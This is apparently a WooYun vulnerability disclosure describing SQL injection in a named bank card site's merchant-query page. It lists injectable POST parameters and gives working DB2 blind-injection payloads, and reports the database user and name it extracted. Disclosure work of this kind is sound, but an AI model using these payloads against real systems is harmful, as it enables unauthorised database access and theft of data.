WooYun.org

存在问题的页面：http://www.hrbcb.com.cn/card/merchant.do?method=merchantQuery
post注入：

然后抓包，测试后发现这里的好几个参数都存在注入：
cityNo
hasCoupon
merchantCategoryNo

以hasCoupon为例：

结合上一张图，可以明显看到存在注入了，且未闭合双引号：
于是先来跑下当前用户：
构造下语句：
手工猜出用户名长度：1 and 8=(select length(user) from sysibm.sysdummy1) --
然后用burp跑出完整的用户名：
payload: 1 and 1=(select ASCII(SUBSTR(user, 1, 1)) from sysibm.sysdummy1)

成功跑出：

DB2INST1
用同样的方法跑出当前数据库：
payload:1 and 6 = (select length(current server) from sysibm.sysdummy1) -- -
payload:1 and 1=(select ASCII(SUBSTR(current server, 1, 1)) from sysibm.sysdummy1) --

HRBBDB